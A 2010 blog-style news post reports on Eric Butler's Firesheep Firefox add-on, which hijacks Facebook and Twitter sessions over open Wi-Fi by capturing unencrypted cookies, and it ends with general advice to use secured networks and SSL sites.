Tuesday, October 26, 2010

Firefox Add-on can Hijack Facebook, Twitter Logins

Secured logins have been one of the most crucial issues pertaining to web security today. Eric Butler, a freelance web application developer showed how vulnerable current day websites are. At the ToorCon security conference, Butlershowed a Firefox add-on dubbed Firesheep that lets anyone scan a Wi-Fi network and steal login details of Facebook, Twitter and several other services. This is one heck of a dangerous extension that points out the security loophole in any website. 

Eric Butler created Firesheep extension for Firefox with an altruistic aim to point out the negligence of popular web services that follow weaker security measures. This Firesheep extension basically exploits the HTTP session hijacking over an open wireless network. Once the user logs in to an encrypted login providing website, the cookie rests on the user's computer. This cookie is not encrypted and vulnerable. With HTTP session hijacking method, an attacker can grab that cookie carrying account information. 

Users from a bunch of popular sites can easily fall prey to Firesheep extension that exists for both Mac OS X and Windows Platform based Firefox browser. With Firesheep, Bulter has not only raised alarm against weaker security following websites but also unsecured open Wi-Fi networks. 

Firesheep snoops around in open Wi-Fi networks and so it's your responsibility to make your Wi-Fi network more secured as well as password protected. Butler stated that the vulnerability always existed since sophisticated hackers have exploited it. Hence now with Firesheep, an average Internet user can understand the importance of secured websites and compel several websites to strengthen their security. 

Since the add-on for Firefox is always free, Firesheep has been downloaded over 100,000 already. Butler said that tools for HTTP session hijacking have always been available on the web. 

Of course it's is dangerous to use this plugin and snoop around the open Wi-Fi networks in public places like coffee shops or malls. For the time being, resist signing into websites that do not offer HTTP or SSL security. Butler promised to post a solution where users can protect themselves against these kinds of attacks.